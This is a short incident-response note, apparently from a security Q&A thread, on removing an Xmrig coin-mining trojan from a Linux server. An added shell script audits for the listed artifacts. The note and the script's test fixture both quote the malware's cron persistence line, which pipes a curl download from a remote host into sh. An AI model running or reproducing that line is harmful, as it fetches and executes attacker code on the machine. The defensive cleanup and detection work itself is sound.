How to find and remove the Xmrig Trojan Miner coin-mining trojan
- On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
- Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
- Removed the directory /opt/yam.
- Removed /root/.ssh/KHK75NEOiq.
- Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
- Stopped the minerd process - pkill minerd.
- Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.
https://security.stackexchange.com/q...s-ec2-instance
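As an added example (not part of the original post), here is a read-only audit that checks a host, or a copied directory tree, for the exact artifacts the post lists: the download-and-execute cron entry, the dropped files under /opt, the planted SSH key, the minerd process and the lady init script. The function names xmrig_audit and demo_audit and the optional root-prefix argument are my own assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post. xmrig_audit [root]
# prints one FINDING line per artifact and, as its last line, the count.
# "root" (assumed, my addition) prefixes every path so the checks can run
# against a constructed tree; with no argument it inspects the live host.

xmrig_audit() {
    root="${1:-}"
    found=0
    # 1. Persistence: a cron entry that pipes a curl download straight into sh.
    for f in "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root"; do
        [ -f "$f" ] || continue
        if grep -E 'curl.*[|][[:space:]]*sh([[:space:]]|$)' "$f" >/dev/null; then
            echo "FINDING: download-and-execute cron entry in $f"
            found=$((found + 1))
        fi
    done
    # 2. Dropped files/directories and the planted SSH key named in the post.
    for p in /opt/yam /opt/minerd /opt/KHK75NEOiq33 /root/.ssh/KHK75NEOiq; do
        if [ -e "$root$p" ]; then
            echo "FINDING: artifact present at $p"
            found=$((found + 1))
        fi
    done
    # 3. Live-host only: a running miner and the rogue 'lady' init script.
    if [ -z "$root" ]; then
        if pgrep -x minerd >/dev/null 2>&1; then
            echo "FINDING: minerd process is running"; found=$((found + 1))
        fi
        if [ -e /etc/init.d/lady ]; then
            echo "FINDING: /etc/init.d/lady service script present"; found=$((found + 1))
        fi
    fi
    echo "$found"    # last line: machine-readable number of findings
}

# Constructed sample tree carrying two of the post's indicators (the cron
# line quoted above and the /opt/yam directory); prints the count, 2.
demo_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/var/spool/cron/crontabs" "$tmp/opt/yam"
    printf '%s\n' '*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh' \
        > "$tmp/var/spool/cron/crontabs/root"
    xmrig_audit "$tmp" | tail -n 1
    rm -rf "$tmp"
}

demo_audit
```

Run it with no argument on a suspect host after the cleanup steps above; a count of 0 means none of the listed artifacts remain, which complements the ps/top checks in the post.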